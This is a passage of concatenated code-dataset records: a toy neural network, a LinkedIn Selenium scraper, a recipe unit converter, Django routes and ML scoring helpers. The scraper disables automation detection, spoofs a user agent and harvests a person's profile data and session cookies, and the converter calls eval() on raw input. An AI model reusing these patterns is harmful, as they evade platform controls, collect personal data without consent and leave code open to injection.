self.synaptic_weights = 2 * np.random.random((10, 15, 1)) - 1\r\n\r\n def sigmoid(self, x):\r\n \"\"\"\r\n\t\tСигмоида\r\n \"\"\"\r\n return 1 / (1 + np.exp(-x))\r\n\r\n def sigmoid_derivative(self, x):\r\n \"\"\"\r\n\t\tПроизводная сигмоиды\r\n \"\"\"\r\n return x * (1 - x)\r\n\r\n\r\n def trainpro(self, training_inputs, training_outputs,j):\r\n\r\n \"\"\"\r\n\t\tОбучение методом обратного распространения\r\n\t\tОдин цикл нужен для прогресс бара\r\n \"\"\"\r\n\r\n output = self.think(training_inputs, j)\r\n\r\n error = training_outputs[j].T - output\r\n\r\n adjustments = np.dot(\r\n training_inputs.T, error * self.sigmoid_derivative(output))\r\n\r\n self.synaptic_weights[j] += adjustments\r\n\r\n def train(self, training_inputs, training_outputs, training_iterations):\r\n \"\"\"\r\n\t\tОбучение методом обратного распространения\r\n \"\"\"\r\n for j in range(10):\r\n for iteration in range(training_iterations):\r\n output = self.think(training_inputs, j)\r\n\r\n \r\n error = training_outputs[j].T - output\r\n\r\n\r\n adjustments = np.dot(\r\n training_inputs.T, error * self.sigmoid_derivative(output))\r\n\r\n\r\n self.synaptic_weights[j] += adjustments\r\n \r\n\r\n def think(self, inputs, number):\r\n \"\"\"\r\n Функция которая пропускает данные через нейросеть и выдаёт вердикт\r\n \"\"\"\r\n\r\n inputs = inputs.astype(float)\r\n output = self.sigmoid(np.dot(inputs, self.synaptic_weights[number]))\r\n return output\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # Инициализация нейросети\r\n neural_network = NeuralNetwork()\r\n\r\n # Тренировочные данные, состоящие из 10 цифр\r\n training_inputs = np.array([[1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1],\r\n [0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1],\r\n [1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1],\r\n [1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1],\r\n [1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 1],\r\n [1, 1, 1, 1, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1],\r\n [1, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1],\r\n [1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1]])\r\n # Выходные данные на каждую цифру\r\n training_outputs = np.array([[[1, 0, 0, 0, 0, 0, 0, 0, 0, 0]],\r\n [[0, 1, 0, 0, 0, 0, 0, 0, 0, 0]],\r\n [[0, 0, 1, 0, 0, 0, 0, 0, 0, 0]],\r\n [[0, 0, 0, 1, 0, 0, 0, 0, 0, 0]],\r\n [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0]],\r\n [[0, 0, 0, 0, 0, 1, 0, 0, 0, 0]],\r\n [[0, 0, 0, 0, 0, 0, 1, 0, 0, 0]],\r\n [[0, 0, 0, 0, 0, 0, 0, 1, 0, 0]],\r\n [[0, 0, 0, 0, 0, 0, 0, 0, 1, 0]],\r\n [[0, 0, 0, 0, 0, 0, 0, 0, 0, 1]]])\r\n\r\n # Вызов функции тренировки\r\n neural_network.train(training_inputs, training_outputs, 20000)\r\n\r\n print(neural_network.synaptic_weights)\r\n\r\n print(\"Output data: \")\r\n for j in range(10):\r\n print(j, \" : %.4f\" % neural_network.think(\r\n np.array([1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1]), j))\r\n","sub_path":"bleeding_edge.py","file_name":"bleeding_edge.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"169807952","text":"import pickle\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport config\nimport logging\n\n\nclass Profile:\n def __init__(self, driver, profile):\n self.have_recent_activities = False\n self.LinkedIn_Dict = {}\n self.driver = driver\n self.profile = profile\n\n self.login(email=config.email, password=config.password)\n self.driver.get(self.profile)\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pv-top-card--list.inline-flex.align-items-center\")))\n logging.info(\"successfully fetched profile\")\n\n def scrape(self):\n self.printProgressBar(0, 7, \"checking for recent activities\\t\", \"Complete\", length=50, printEnd=\"\\r\\n\")\n self.check_recent_activities()\n self.printProgressBar(1, 7, \"fetching profile picture\\t\\t\", \"Complete\", length=50, printEnd=\"\\r\\n\")\n self.fetch_profile_picture()\n self.printProgressBar(2, 7, \"fetching interest categories\\t\", \"Complete\", length=50, printEnd=\"\\r\\n\")\n self.fetch_interest_categories()\n self.printProgressBar(5, 7, \"fetching recent activities\\t\\t\", \"Complete\", length=50, printEnd=\"\\r\\n\")\n self.fetch_recent_activies()\n self.printProgressBar(6, 7, \"extracting keywords using NLP model\", \"Complete\", length=50, printEnd=\"\\r\\n\")\n pickle.dump(self.driver.get_cookies(), open(\"cookies.pkl\", \"wb\"))\n self.driver.quit()\n\n logging.info(\"finished scrapping\")\n\n def check_recent_activities(self):\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located(\n (By.CLASS_NAME, \"pv-recent-activity-section-v2__summary.t-14.t-black--light.t-normal\")))\n if \"last 90 days are displayed here\" not in \\\n self.driver.find_element_by_class_name(\n \"pv-recent-activity-section-v2__summary.t-14.t-black--light.t-normal\").text:\n self.have_recent_activities = True\n else:\n logging.warning(\"no recent activities\")\n\n def fetch_profile_picture(self):\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located(\n (By.CLASS_NAME, \"presence-entity.presence-entity--size-9.pv-top-card__image\")))\n profile_pic = self.driver.find_element_by_class_name(\n \"presence-entity.presence-entity--size-9.pv-top-card__image\").find_element_by_xpath(\"./img\")\n if \"data:image/gif\" in profile_pic.get_attribute('src'):\n self.LinkedIn_Dict[\"Profile Picture\"] = None\n logging.warning(\"no profile picture\")\n else:\n self.LinkedIn_Dict[\"Profile Picture\"] = profile_pic.get_attribute('src')\n logging.info(\"successfully fetched profile picture\")\n\n def fetch_interest_categories(self):\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight)\")\n self.LinkedIn_Dict['Interests'] = {}\n self.driver.get(self.profile + '/detail/interests/')\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.XPATH, \"//*[contains(@id, 'pv-interests-modal__following')]\")))\n interest_categories = self.driver.find_elements_by_xpath(\"//*[contains(@id, 'pv-interests-modal__following')]\")\n\n for interest_category in interest_categories:\n self.LinkedIn_Dict['Interests'][interest_category.text] = interest_category.get_attribute('href')\n\n logging.info(\"successfully fetched interest categories\")\n logging.debug('found', len(self.LinkedIn_Dict['Interests']), 'interest categories')\n\n i = 1\n for key, values in self.LinkedIn_Dict['Interests'].items():\n self.driver.get(values)\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pv-entity__summary-title-text\")))\n WebDriverWait(self.driver, 1)\n if key == 'Influencers':\n interest_names = self.driver.find_elements_by_class_name(\"pv-entity__summary-title-text\")\n interest_descriptions = self.driver.find_elements_by_class_name(\"pv-interest-entity-link.ember-view\")\n self.LinkedIn_Dict['Interests'][key] = [\n {'Name': interest_name.text, 'Description': interest_description.get_attribute(\"href\")}\n for interest_name, interest_description in zip(interest_names, interest_descriptions)]\n elif key == 'Companies':\n interest_names = self.driver.find_elements_by_class_name(\"pv-entity__summary-title-text\")\n company_links = self.driver.find_elements_by_class_name(\"pv-interest-entity-link.ember-view\")\n self.LinkedIn_Dict['Interests'][key] = [\n {'Name': interest_name.text, 'Industry': link.get_attribute(\"href\")}\n for interest_name, link in zip(interest_names, company_links)]\n # else:\n # interest_names = driver.find_elements_by_class_name(\"pv-entity__summary-title-text\")\n # LinkedIn_Dict['Interests'][key] = [{'Name': interest_names.text} for interest_names in interest_names]\n logging.debug('fetched', i, 'interest categories')\n i += 1\n\n self.fetch_influencer_info()\n self.fetch_company_info()\n\n def fetch_influencer_info(self):\n if 'Influencers' in self.LinkedIn_Dict['Interests']:\n for index in range(len(self.LinkedIn_Dict['Interests']['Influencers'])):\n description = self.LinkedIn_Dict['Interests']['Influencers'][index]['Description']\n self.driver.get(description)\n try:\n WebDriverWait(self.driver, 3).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pv-about__summary-text.mt4.t-14.ember-view\")))\n description = self.driver.find_element_by_class_name(\n \"pv-about__summary-text.mt4.t-14.ember-view\").text\n except:\n WebDriverWait(self.driver, 3).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"mt1.t-18.t-black.t-normal.break-words\")))\n description = self.driver.find_element_by_class_name(\"mt1.t-18.t-black.t-normal.break-words\").text\n\n self.LinkedIn_Dict['Interests'][\"Influencers\"][index]['Description'] = description\n logging.info(\"successfully fetched interest influencer infos\")\n\n def fetch_company_info(self):\n if 'Companies' in self.LinkedIn_Dict['Interests']:\n for index in range(len(self.LinkedIn_Dict['Interests']['Companies'])):\n company_link = self.LinkedIn_Dict['Interests']['Companies'][index]['Industry']\n self.driver.get(company_link)\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"org-top-card-summary-info-list__info-item\")))\n company_sector = self.driver.find_element_by_class_name(\n \"org-top-card-summary-info-list__info-item\").text\n self.LinkedIn_Dict['Interests'][\"Companies\"][index]['Industry'] = company_sector\n logging.info(\"successfully fetched interest company infos\")\n\n def fetch_recent_activies(self):\n if self.have_recent_activities:\n self.driver.get(self.profile + '/detail/recent-activity/')\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"occludable-update.ember-view\")))\n RAs = self.driver.find_elements_by_class_name(\"occludable-update.ember-view\")\n\n self.LinkedIn_Dict['Recent Activities'] = [{'Article Author': None,\n 'Author Description': None,\n 'Activity': None} for i in range(min(5, len(RAs)))]\n for index in range(5):\n ra = RAs[index]\n try:\n self.LinkedIn_Dict['Recent Activities'][index]['Article Author'] = \\\n ra.find_element_by_class_name(\n \"feed-shared-actor__name.t-14.t-bold.hoverable-link-text.t-black\").text\n except:\n pass\n\n try:\n description = ra.find_element_by_class_name(\n \"feed-shared-actor__description.t-12.t-normal.t-black--light\").text or \\\n ra.find_element_by_class_name(\n \"feed-shared-text-view.white-space-pre-wrap.break-words.ember-view\").text\n self.LinkedIn_Dict['Recent Activities'][index]['Author Description'] = \\\n description if 'follower' not in description else None\n except:\n pass\n\n try:\n self.LinkedIn_Dict['Recent Activities'][index]['Activity'] = ra.find_element_by_class_name(\n \"feed-shared-text-view.white-space-pre-wrap.break-words.ember-view\").text\n except:\n pass\n\n logging.info('successfully fetched recent activities')\n\n def login(self, email=None, password=None):\n self.driver.get(\"https://www.linkedin.com/login\")\n WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, \"username\")))\n\n email_elem = self.driver.find_element_by_id(\"username\")\n email_elem.send_keys(email)\n\n password_elem = self.driver.find_element_by_id(\"password\")\n password_elem.send_keys(password)\n password_elem.submit()\n\n WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, \"profile-nav-item\")))\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"profile-rail-card__actor-link.t-16.t-black.t-bold\")))\n\n def printProgressBar(self, iteration, total, prefix='', suffix='', decimals=1, length=100, fill='█', printEnd=\"\\r\"):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n printEnd - Optional : end character (e.g. \"\\r\", \"\\r\\n\") (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print(f'\\r{prefix} |{bar}| {percent}% {suffix}', end=printEnd)\n # Print New Line on Complete\n if iteration == total:\n print()\n\n\ndef linkedin_scrapper(profile_link):\n logging.basicConfig(filename='scrape.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s')\n\n options = Options()\n options.add_argument('--headless')\n options.add_argument('--no-sandbox')\n options.add_argument('--disable-dev-shm-usage')\n options.add_argument(\"window-size=1280,800\")\n options.add_argument(\n \"user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\")\n options.add_argument('--disable-blink-features=AutomationControlled')\n driver = webdriver.Chrome(\"C:\\\\Users\\\\yangc\\\\Desktop\\\\Python\\\\Hack4Good-2021-LinkedIn_Keyword_Extractor\\\\chromedriver.exe\", options=options)\n try:\n cookies = pickle.load(open(\"cookies.pkl\", \"rb\"))\n for cookie in cookies:\n driver.add_cookie(cookie)\n except:\n pass\n\n logging.info(\"driver setup done\")\n\n scraper = Profile(driver=driver, profile=profile_link)\n\n scraper.scrape()\n return scraper.LinkedIn_Dict\n\n\nif __name__ == \"__main__\":\n linkedin_scrapper(\"xxx\")\n","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":12465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"111631009","text":"# Conversion Function...\n\nimport csv\n\n# ***** Functions go here *****\ndef general_converter(how_much, lookup, dictionary, conversion_factor):\n\n if lookup in dictionary:\n mult_by = dictionary.get(lookup)\n how_much = how_much * float(mult_by) / conversion_factor\n converted = \"yes\"\n else:\n converted = \"no\"\n return [how_much, converted]\n\ndef unit_checker():\n\n unit_tocheck = input(\"Unit? \")\n\n # Abbreviation lists\n teaspoon = [\"tsp\", \"teaspoon\", \"t\",\"teaspoons\"]\n tablespoon = [\"tbs\", \"tablespoon\", \"T\", \"tbsp\",\"tablespoons\"]\n cup = [\"c\", \"cup\",\"cups\"]\n ounce = [\"oz\", \"fluid\", \"ounce\", \"fl-pt\",\"ounces\"]\n pint = [\"p\", \"qt\", \"fl\", \"gt\", \"pint\",\"pints\"]\n quart = [\"q\", \"qt\", \"quart\", \"fl-qt\",\"quarts\"]\n pound = [\"lb\", \"#\", \"pound\",\"pounds\"]\n litre = [\"litre\",\"liter\",\"l\",\"litres\",\"liters\"]\n mls = [\"ml\",\"milliliter\",\"millilitre\",\"milliliters\",\"millilitres\"]\n\n if unit_tocheck == \"\":\n return unit_tocheck\n elif unit_tocheck == \"T\" or unit_tocheck.lower() in tablespoon:\n return \"tbs\"\n elif unit_tocheck.lower() in teaspoon:\n return \"tsp\"\n elif unit_tocheck == 'C' or unit_tocheck.lower() in cup:\n return \"cup\"\n elif unit_tocheck.lower() in ounce:\n return \"ounce\"\n elif unit_tocheck.lower() in pint:\n return \"pint\"\n elif unit_tocheck.lower() in quart:\n return \"quart\"\n elif unit_tocheck.lower() in pound:\n return \"pound\"\n else:\n pass\n\nunit_central = {\n \"tsp\": 5,\n \"tbs\": 15,\n \"cup\": 237,\n \"ounce\": 28.35,\n \"pint\": 473,\n \"quart\": 946,\n \"pound\": 454,\n \"litre\": 1000,\n \"ml\": 1\n}\n\ngroceries = open('01_ingredients_ml_to_g.csv')\n\ncsv_groceries = csv.reader(groceries)\n\nfood_dictionary = {}\n\n\nfor row in csv_groceries:\n food_dictionary[row[0]] = row[1]\n\nprint(food_dictionary)\nkeep_going = ''\nif __name__ == '__main__':\n while keep_going =='':\n amount = eval(input('How much? '))\n amount = float(amount)\n\n # Get unit and change it to match dictionary\n unit = unit_checker()\n ingredient = input('Ingredient: ')\n\n # Convert to mls if possible\n amount = general_converter(amount, unit, unit_central, 1)\n print(amount)\n\n # If we converted to mls, try and convert to grams\n if amount[1] == \"yes\":\n amount_2 = general_converter(amount[0], ingredient, food_dictionary, 250)\n\n # if the ingredient is in the list, convert it\n if amount_2[1] == \"yes\":\n print(amount_2)\n\n # if the ingredient is not in the list, leave the unit as ml\n else:\n print(\"unchanged\")\n\n # keep_going = input(\" or q \")\n\n\n\n","sub_path":"08_converter_v2.py","file_name":"08_converter_v2.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"408058366","text":"#与前端相关\nfrom django.conf.urls import url\nfrom haystack.views import SearchView\n\nfrom blog.views import index, archive, article, comment_post, do_logout, do_reg, do_login, category, tag,about,contact\n\nurlpatterns = [\n url(r'^$',index , name = 'index'),\n url(r'^archive/$', archive, name='archive'),\n url(r'^article/$', article, name='article'),\n url(r'^comment/post/$', comment_post, name='comment_post'),\n url(r'^logout$', do_logout, name='logout'),\n url(r'^reg', do_reg, name='reg'),\n url(r'^login', do_login, name='login'),\n url(r'category/$',category,name='category'),\n url(r'tag/$', tag, name='tag'),\n url(r'about/$', about, name='about'),\n url(r'contact/$', contact, name='contact'),\n url(r'^search/$', SearchView(), name='haystack_search'),\n\n]\n\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"161142258","text":"\nfrom sklearn import model_selection\nfrom sklearn import metrics\nfrom sklearn.svm import SVR\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nfrom sklearn import ensemble\nimport DataManager as DM\n\nfrom random import seed\nfrom random import random\nfrom random import randrange\n\ndef subsample(X,Y):\n X_new=pd.DataFrame()\n Y_new=pd.DataFrame()\n\n n_sample = len(X)\n for i in range(n_sample):\n index = np.random.randint(0,n_sample)\n X_new=X_new.append(X.iloc[index])\n Y_new=Y_new.append(Y.iloc[index])\n\n return X_new,Y_new\n\n\ndef MAPE(Y_measured,Y_pred):\n abs_diff=np.abs(Y_measured-Y_pred)\n abs_diff.fillna(0,inplace=True)\n #print(Y_measured)\n\n remove_ind=Y_measured==Y_pred\n #print(np.sum(remove_ind))\n for key in Y_measured.columns:\n remove_ind_temp=Y_measured[key]==0\n #remove_ind_temp=remove_ind_temp&Y_measured[key]==0\n remove_ind[key]=remove_ind[key]|remove_ind_temp\n abs_diff=abs_diff[~remove_ind]\n Y_measured = Y_measured[~remove_ind]\n\n sAPE=pd.DataFrame(data=np.where(remove_ind,0,abs_diff/(np.abs(Y_measured))),columns=abs_diff.columns,index=abs_diff.index)\n\n return np.mean(sAPE)*100\n\ndef get_sample_deviation(measured,predicted):\n diff=np.abs(measured-predicted)\n delta=1e-100\n diff.fillna(0, inplace=True)\n\n if False:\n remove_ind = measured == measured\n print(np.sum(remove_ind))\n for key in measured.columns:\n remove_ind_temp = measured[key] == 0\n # remove_ind_temp=remove_ind_temp&Y_measured[key]==0\n remove_ind[key] = remove_ind[key] | remove_ind_temp\n\n #return np.abs(predicted/(measured+1e-10))*100\n return pd.DataFrame(data=np.where(measured==0,0,diff/(measured)*100),columns=diff.columns,index=diff.index)\n\n\ndef get_sample_deviation_flow(measured,predicted):\n diff=measured-predicted\n print(np.mean(diff))\n #diff=diff-np.mean(diff)\n delta=1e-100\n\n #return np.abs(predicted/(measured+1e-10))*100\n #ind_zero=measured==0\n #print(np.sum(ind_zero))\n res=diff/(measured)*100\n #res[ind_zero]=0\n #res.loc[ind_zero] = 0\n\n return res\ndef startswith(col,tag):\n return col.split('_')[0]==tag\ndef remove_zero_measurements(X,Y,cols):\n\n for col in cols:\n if not (startswith(col,'GJOA') or startswith(col,'Total')):\n ind_zero_mes=Y[col]==0\n ind_not_zero_chk=X[col.split('_')[0] + '_CHK'] != 0\n X=X[~(ind_zero_mes&ind_not_zero_chk)]\n Y=Y[~(ind_zero_mes&ind_not_zero_chk)]\n return X,Y\ndef get_predicted_and_measured_df(model,data,X,Y):\n cols = model.output_tag_ordered_list\n\n measured = pd.DataFrame(data=data.inverse_transform(Y, 'Y'), columns=cols)\n\n predicted = data.inverse_transform(model.predict(X), 'Y')\n predicted = pd.DataFrame(data=predicted, columns=cols)\n predicted = predicted.set_index(Y.index)\n return measured,predicted\ndef get_choke_diff_deviation(model,data,X,Y):\n cols = model.output_tag_ordered_list\n choke_delta_range=np.arange(10, 100, 10)\n\n deviation_points=pd.Series()\n X_transformed=data.inverse_transform(X,'X')\n\n measured, predicted = get_predicted_and_measured_df(model, data, X, Y)\n\n for delta in choke_delta_range:\n ind=None\n for col in cols:\n name=col.split('_')[0]\n if ind is None:\n ind_temp1=X_transformed[name+'_delta_CHK']>=(delta-10)\n ind_temp2=X_transformed[name+'_delta_CHK']<=delta\n ind=ind_temp1&ind_temp2\n else:\n ind_temp1 = X_transformed[name + '_delta_CHK'] >= (delta - 10)\n ind_temp2 = X_transformed[name + '_delta_CHK'] <= delta\n ind_temp = ind_temp1&ind_temp2\n ind=ind|ind_temp\n #print(np.sum(ind))\n deviation=get_sample_deviation(measured,predicted)\n\n\n #deviation.fillna(0, inplace=True)\n\n #print(deviation)\n #exit()\n #print(delta)\n deviation_points[str(delta-10)+'-'+str(delta)]=deviation['B1_PDC'].mean()\n count, division = np.histogram(deviation_points)\n deviation_points.hist(bins=division)\n plt.show()\ndef get_chk_zero_ind(data,col):\n name=col.split('_')[0]\n return data[name+'_CHK']==0\ndef get_cumulative_deviation(model,data,X,Y,do_remove_zeros=True):\n\n cols = model.output_tag_ordered_list\n deviation_range = np.arange(0, 100, 0.5)\n\n measured, predicted=get_predicted_and_measured_df(model,data,X,Y)\n\n deviation_points = get_sample_deviation(measured, predicted)\n #deviation_points.fillna(0,inplace=True)\n\n\n\n if do_remove_zeros:\n for col in cols:\n if col.split('_')[0] not in ['GJOA','Total']:\n ind=get_chk_zero_ind(data.inverse_transform(X,'X'),col)\n print(np.sum(ind))\n deviation_points.loc[ind,col]=0\n\n\n\n cumulative_deviation=pd.DataFrame(data=np.zeros((len(deviation_range),len(cols))),columns=cols)\n cumulative_deviation=cumulative_deviation.set_index(deviation_range)\n cumulative_deviation.index.name=None\n\n N = len(deviation_points)\n for col in cols:\n for percentage in deviation_range:\n cumulative_deviation[col][percentage]=np.sum(deviation_points[col]<=percentage)/N*100\n\n\n #print(deviation_points)\n #for i in deviation_points.index.values:\n # print(deviation_points['B1_QGAS'].loc[[i]])\n return cumulative_deviation\n\n\ndef get_absolute_deviation(model,data,X,Y):\n cols = model.output_tag_ordered_list\n #deviation_range = np.arange(0, 50, 1)\n\n measured, predicted = get_predicted_and_measured_df(model, data, X, Y)\n\n deviation_points = get_sample_deviation(measured, predicted)\n deviation_points.fillna(0, inplace=True)\n for key in cols:\n if key.split('_')[0] not in ['GJOA','Total']:\n chk_col=key.split('_')[0]+'_CHK'\n ind_zero=data.inverse_transform(X,'X')[chk_col]<5\n deviation_points.loc[ind_zero, key] = 0\n\n return deviation_points\n\ndef count_number_of_samples_below_cum_devation(thresh,cumulative_error,tag):\n return cumulative_error.sum(axis=1)[tag][thresh]\n\n\ndef train_test_split(X,Y,test_size):\n split_length=int(len(X)*(1-test_size))\n X_train,X_test=X[0:split_length],X[split_length-1:-1]\n Y_train,Y_test=Y[0:split_length],Y[split_length-1:-1]\n return X_train,X_test,Y_train,Y_test\n\ndef get_train_test_val_data(X,Y,test_size,val_size):\n #X = Data.X_transformed\n #Y = Data.Y_transformed\n\n #X=X.reshape(1,X.shape[0],X.shape[1])\n #Y = Y.reshape(1, Y.shape[0], Y.shape[1])\n # X, Y = remove_chk_zeros(X, Y, 'B2')\n X, X_test, Y, Y_test = train_test_split(X, Y, test_size=test_size)\n X_train, X_val, Y_train, Y_val = train_test_split(X, Y, test_size=val_size)\n\n return X_train,Y_train,X_val,Y_val,X_test,Y_test\ndef split_data(X,Y,split_size):\n\n X_start, X_end, Y_start, Y_end = train_test_split(X, Y, test_size=split_size)\n\n\n return X_start,Y_start,X_end,Y_end\n\n\n\n\ndef evaluate_model2(model,data,X_train,X_test,Y_train,Y_test):\n score_train_MSE, score_test_MSE, score_train_r2, score_test_r2, cols = model.evaluate(data, X_train, X_test,Y_train, Y_test)\n\n return print_scores(data, Y_train, Y_test, score_train_MSE, score_test_MSE, score_train_r2, score_test_r2,cols),scores_to_latex(data, Y_train, Y_test, score_train_MSE, score_test_MSE, score_train_r2, score_test_r2,cols)\ndef print_scores(data,Y_train,Y_test,score_train_MSE, score_test_MSE, score_train_r2, score_test_r2,cols):\n\n #Treig og daarlig kode, fiks paa dette!!!!!!!!!\n n_empty_space=30\n def print_empty_space(s,n):\n s+=' '*n\n return s\n def scores_to_tabbed_string(s,scores_train,score_test,cols,Y=[]):\n for i,col in zip(range(len(cols)),cols):\n s_temp='{0}: {1:0.2f}'.format(col,scores_train[i])\n s_len=len(s_temp)\n s_temp=print_empty_space(s_temp,n_empty_space-s_len)\n s_temp =''.join((s_temp,'{0}: {1:0.2f}'.format( col,score_test[i])))\n if len(Y)>0:\n Y_MEAN=np.mean(Y[col][Y[col]>0])\n s_temp = print_empty_space(s_temp, 2*n_empty_space - len(s_temp))\n s_temp=''.join((s_temp,'{0}: {1:0.2f}%'.format(col,score_test[i]/Y_MEAN*100)))\n s_temp = print_empty_space(s_temp, 3 * n_empty_space - len(s_temp)+10)\n s_temp =''.join((s_temp, '{0}: {1:0.2f}'.format(col, Y_MEAN)))\n s_temp=''.join((s_temp,'\\n'))\n s=''.join((s,s_temp))\n return s\n\n\n\n s=' #### Scores #### \\n'\n s=''.join((s,'RMSE TRAIN:'))\n s=print_empty_space(s,n_empty_space-len('RMSE TRAIN:'))\n s=''.join((s,'RMSE VAL:'))\n s = print_empty_space(s, n_empty_space - len('RMSE VAL:'))\n s=''.join((s,'Percentage error (VAL/MEAN)*100'))\n s = print_empty_space(s, 10+n_empty_space - len('Percentage error (VAL/MEAN)*100'))\n s = ''.join((s,'MEAN'))\n s+=''.join((s,'\\n'))\n s+='------------------------------------------------------------------------------------------------------------------------\\n'\n s=scores_to_tabbed_string(s,np.sqrt(score_train_MSE),np.sqrt(score_test_MSE),cols,data.inverse_transform(Y_test,'Y'))\n s += '-------------------------------------------------------\\n'\n s += 'R2 TRAIN:'\n s = print_empty_space(s, n_empty_space-len('R2 TRAIN:'))\n s += 'R2 VAL: \\n'\n s += '-------------------------------------------------------\\n'\n s = scores_to_tabbed_string(s, score_train_r2,score_test_r2, cols)\n s += '-------------------------------------------------------\\n'\n s+='#### ------ #### \\n'\n return s\n\n\ndef remove_chk_zeros(X,Y,well):\n\n #X_cols=[well+'_PDC',well+'_CHK']\n #Y_cols=[well+'_PWH']\n\n #Y=Y[Y_cols]\n #X=X[X_cols]\n\n ind=X[well+'_CHK']<0.05\n Y=Y[~ind]\n X=X[~ind]\n return X,Y\ndef save_to_file(filename,str):\n PATH = '/Users/UAC/GITFOLDERS/MasterThesisCode/Models/NeuralNetworks/'\n PATH='C:/users/ugurac/Documents/GITFOLDERS/MasterThesisCode/Models/NeuralNetworks/'\n f = open(PATH + filename + '_config', 'w')\n f.write(str)\n f.close()\n\ndef scores_to_latex(data, Y_train, Y_test, score_train_MSE, score_test_MSE, score_train_r2, score_test_r2, cols):\n\n # Treig og daarlig kode, fiks paa dette!!!!!!!!!\n n_empty_space = 30\n\n def print_empty_space(s, n):\n s += ' ' * (n-1)\n s+='&'\n return s\n\n def scores_to_tabbed_string(s, scores_train, score_test, cols, Y=[]):\n for i, col in zip(range(len(cols)), cols):\n #col=col.replace('_','_')\n s_temp = '{0}& {1:0.2f}'.format(col.replace('_','\\_'), scores_train[i])\n s_len = len(s_temp)\n s_temp = print_empty_space(s_temp, n_empty_space - s_len)\n s_temp = ''.join((s_temp, '{0:0.2f}'.format(score_test[i])))\n if len(Y) > 0:\n Y_MEAN = np.mean(Y[col][Y[col] > 0])\n s_temp = print_empty_space(s_temp, 2 * n_empty_space - len(s_temp))\n s_temp = ''.join((s_temp, '{0:0.2f}\\%'.format(score_test[i] / Y_MEAN * 100)))\n s_temp = print_empty_space(s_temp, 3 * n_empty_space - len(s_temp) + 10)\n s_temp = ''.join((s_temp, '{0:0.2f}'.format(Y_MEAN)))\n s_temp = ''.join((s_temp, '\\\\\\ \\n'))\n s = ''.join((s, s_temp))\n return s\n\n #s = ' #### Scores #### \\\\\\ \\n'\n s='\\hline \\n'\n s = ''.join((s, 'Tag&RMSE TRAIN:'))\n\n s = print_empty_space(s, n_empty_space - len('RMSE TRAIN:'))\n s = ''.join((s, 'RMSE VAL:'))\n s = print_empty_space(s, n_empty_space - len('RMSE VAL:'))\n s = ''.join((s, 'Percentage error (VAL/MEAN)*100'))\n s = print_empty_space(s, 10 + n_empty_space - len('Percentage error (VAL/MEAN)*100'))\n s = ''.join((s, 'MEAN'))\n s+='\\\\\\\\'\n s += '\\n \\hline \\n '\n #s = ''.join((s, '\\\\\\ \\n'))\n #s += '------------------------------------------------------------------------------------------------------------------------\\\\\\ \\n'\n s = scores_to_tabbed_string(s, np.sqrt(score_train_MSE), np.sqrt(score_test_MSE), cols,\n data.inverse_transform(pd.concat([Y_train, Y_test], axis=0),'Y'))\n #s += '-------------------------------------------------------\\\\\\ \\n'\n s += '\\n \\hline \\n '\n s += 'Tag&R2 TRAIN:'\n s = print_empty_space(s, n_empty_space - len('R2 TRAIN:'))\n s += 'R2 VAL:&\\\\\\ 